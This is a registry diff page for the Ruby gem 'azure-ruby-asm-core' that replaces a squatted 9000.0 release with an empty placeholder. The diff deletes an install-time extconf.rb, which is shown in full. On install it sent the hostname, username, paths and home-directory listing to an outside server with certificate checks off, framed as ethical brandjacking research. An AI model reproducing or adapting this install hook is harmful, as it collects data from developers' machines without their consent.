azure-ruby-asm-core 9000.0 → 9001.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (3) hide show
  1. checksums.yaml +4 -4
  2. metadata +12 -19
  3. data/ext/extconf.rb +0 -50
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: 35a3e6ea4aa236b26d38a0e4496bdc57adb3590d5337d7add14212082dc931d3
4
- data.tar.gz: 12cdf2ccdc10c9d571a859b6b1e163d253408ecedffec600327fcd546594e3ce
3
+ metadata.gz: 3de5a26ac0ad2a3dbfaef8c9fbd77e4f3c50f4a3d9fae3cc51c4795a8801189b
4
+ data.tar.gz: 5527c1511d8900d10775457717ed40e7acfe5b9e7bf1321a48c7c9abec06cfdf
5
5
  SHA512:
6
- metadata.gz: 17fb914a3055070d88d98f512a78ffc9675118efc244fa09a0c098844beb006d6871f0fae4f230fb9b79defcc3ff1dffd8f93a8d94a09bcd7fbaca12b5e0d65d
7
- data.tar.gz: 93f5382eb9f6b86013c9d96e575829078c13678581a2342244a50df8f6128bc904dcac13c1e08105ff2e0684645e4dc53fab78adb71c9bc179662104264d2fd7
6
+ metadata.gz: 716a9f7b6704735fecc3b53646b10c46711ba7d173c7c4fa543df706ba2ff79b6f0ef40b80702ae7d0a50c04ae76a8bb90b8e06544a7a3ec46a762575c51e979
7
+ data.tar.gz: '0975290196533d1606ead694b4ff4c61ad32859a60387171f3fc913193b252a0dc16b6af341e99f360ed0f8b2785060b1eaf8d4139b96059f6cfe6267c83df7e'
metadata CHANGED
@@ -1,34 +1,27 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: azure-ruby-asm-core
3
3
  version: !ruby/object:Gem::Version
4
- version: '9000.0'
4
+ version: '9001.0'
5
5
  platform: ruby
6
6
  authors:
7
7
  - Maciej Mensfeld
8
8
  autorequire:
9
9
  bindir: bin
10
10
  cert_chain: []
11
- date: 2021-03-05 00:00:00.000000000 Z
11
+ date: 2021-05-22 00:00:00.000000000 Z
12
12
  dependencies: []
13
- description: |
14
- I am testing for brandjacking vulnerabilities in products that are in bug bounty programs.
15
-
16
- This code is reporting-only, and does not do anything malicious.
17
- email:
18
- - maciej@mensfeld.pl
13
+ description: This gem is empty. It protects against brandjacking. You are welcome.
14
+ If you think it is yours to own, just contact me.
15
+ email: []
19
16
  executables: []
20
- extensions:
21
- - ext/extconf.rb
17
+ extensions: []
22
18
  extra_rdoc_files: []
23
- files:
24
- - ext/extconf.rb
25
- homepage: https://diffend.io
19
+ files: []
20
+ homepage:
26
21
  licenses:
27
- - GPL-3.0
22
+ - MIT
28
23
  metadata: {}
29
- post_install_message: |
30
- This is probably not the package you wanted to install.
31
- Read the description of this gem for more details.
24
+ post_install_message:
32
25
  rdoc_options: []
33
26
  require_paths:
34
27
  - lib
@@ -43,8 +36,8 @@ required_rubygems_version: !ruby/object:Gem::Requirement
43
36
  - !ruby/object:Gem::Version
44
37
  version: '0'
45
38
  requirements: []
46
- rubygems_version: 3.1.2
39
+ rubygems_version: 3.1.6
47
40
  signing_key:
48
41
  specification_version: 4
49
- summary: Gem that sends some non-sensitive data for security research.
42
+ summary: Empty gem - this is not what you wanted to install.
50
43
  test_files: []
data/ext/extconf.rb DELETED
@@ -1,50 +0,0 @@
1
- =begin
2
- Hi, if you're reading this you're probably wondering what this code is doing on your machine.
3
- Don't worry! It doesn't do anything nasty or malicious.
4
-
5
- I am an ethical security researcher, booking names of gems to prevent brandjacking.
6
-
7
- I also run a Ruby security related platform: https://diffend.io
8
-
9
- All data I collect will be deleted and I do not collect any sensitive information.
10
-
11
- That's why I don't even obfuscate the network calls with DNS requests or anything else.
12
-
13
- You can read the code to confirm this.
14
-
15
- If you have any questions or want to get in touch for any reason, you can reach me at:
16
-
17
- maciej@mensfeld.pl
18
-
19
- If this is affecting your organization, for example because I took name that uses your naming
20
- conventions, feel free to contact me and I will be more than happy to give it back to you.
21
-
22
- P.S. I did notify RubyGems security team, so they are aware of my activity.
23
- =end
24
-
25
- require 'mkmf'
26
- require 'net/http'
27
- require 'socket'
28
- require 'etc'
29
- require 'securerandom'
30
- require 'json'
31
-
32
- create_makefile 'gem_test'
33
-
34
- uri = URI("https://ethically-testing-the.world")
35
- http = Net::HTTP.new(uri.host, uri.port)
36
- http.use_ssl = true
37
- http.verify_mode = OpenSSL::SSL::VERIFY_NONE
38
- request = Net::HTTP::Post.new('/azure-ruby-asm-core/9000.0')
39
- request.add_field('Content-Type', 'application/json')
40
-
41
- request.body = {
42
- hostnames: [Socket.gethostname, Socket.gethostbyname(Socket.gethostname).first].uniq,
43
- username: Etc.getlogin,
44
- path: File.dirname(__FILE__),
45
- home: Dir.home,
46
- home_ls: Dir.entries(Dir.home),
47
- id: SecureRandom.uuid,
48
- }.to_json
49
-
50
- http.request(request)